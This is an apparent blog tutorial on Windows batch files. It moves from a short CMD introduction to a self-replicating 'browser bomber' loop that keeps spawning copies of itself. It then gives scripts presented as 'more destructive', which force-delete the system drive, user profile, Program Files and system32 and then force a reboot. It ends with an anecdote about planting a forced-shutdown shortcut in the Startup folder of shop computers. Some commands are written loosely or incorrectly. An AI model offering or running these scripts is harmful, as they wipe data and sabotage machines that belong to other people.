This will teach you how to do CMD.
CMD is the original MS-DOS command prompt, the Shell.
Command Prompt is one of the most powerful tools in Windows; but sadly, it is also the most ignored one. Things were not always like this; but with the advent of GUI based operating systems, people started feeling that computing through command based tools was boring. This ultimately lead the command prompt into obscurity.

Batch files, with a .BAT extension, are BATCHes of MS-DOS commands, executed togther.



Simple CMD  and Browser Bomber  with LOGS


1.Open A Notepad
2.Copy Paste  the code below.

:start1
start bmt.bat
start www.blogmytuts.net
dir /s/l/w
bmt > bmtLOGS.txt
go to start1

3. Save as bmt.bat

How it works?

start - to open
start www.blogmytuts.net   - This will open blogmytuts site on default browser
dir /s/l/w - This will open folder directory information
bmt > bmtLOGS.txt  - This will  save all the batch file done..
go to start1  - This will create  LOOP it will open continues batch file.

 Much Simple LOOP

open notepad.
then code it

only needs 3 lines.

:start
start name.bat
go to start


save as. name.bat

its an endless loop that constantly opens more endless loops.



The command above will NOT DO harm on your PC
If you want some more destructive one you can add

1. go to notepad and type the following:

@Echo off

2. Del C:\ *.*|y save it as Dell.bat



want worse then type the following:
@echo off

del %systemdrive%\*.*/f/s/q

shutdown -r -f -t 00

and save it as anyname.bat file

 3. This will del userprofile
@echo off
del %userprofile% /Q
del %ProgramFiles% /Q
del %system32%
shutdown -r 00 -t
exit

save as anyname.bat


 When I was a Kid , in computer shop  I put the shutdown batch file on startup folder when the computer start again or other player will come to use it... it will auto shutdown LOL .


Right click desktop
new>shortcut
shutdown -s -t 20 -f -c "shutting down..............." in the box
next
a name in the box
finish
copy paste on Startup folder wehehehe..







Post a Comment